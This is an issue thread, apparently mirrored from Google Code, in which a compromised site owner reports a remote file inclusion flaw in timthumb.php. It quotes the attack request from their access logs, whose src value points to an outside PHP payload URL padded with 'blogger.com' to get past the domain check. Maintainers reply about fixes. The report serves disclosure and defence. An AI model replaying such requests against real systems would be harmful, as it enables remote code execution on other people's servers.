annanttf / timthumb

Automatically exported from code.google.com/p/timthumb
0 stars 0 forks source link

Timthumb remote file inclusion bypass URL verification #394

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
My VPS was compromised, and the vulnerability is “timthumb.php”.  It is 
vulnerable to remote file inclusion. The following line was taken out of my 
access logs.

(/category/technology//wp-admin/themes/minimalisto/lib/timthumb.php?src=http://b
logger.com.website499.com/byroe.php)

As you can see, the url where the exploit was hosted, included 
“blogger.com”. This is how they were able to bypass the URL 
check/verification within “timthumb.php”.

Original issue reported on code.google.com by AndrewDe...@gmail.com on 7 Aug 2012 at 8:39

GoogleCodeExporter commented 9 years ago
The same problem, solved by deleting rows 127-135 (array $ALLOWED_SITES).

The whole discussion here http://www.separatista.net/forum/topic.php?id=1282

Original comment by lukenzi on 17 Aug 2012 at 3:51

GoogleCodeExporter commented 9 years ago
This was solved more than a year ago. Please make sure you keep your scripts up 
to date!

Original comment by BinaryMoon on 3 Dec 2012 at 7:47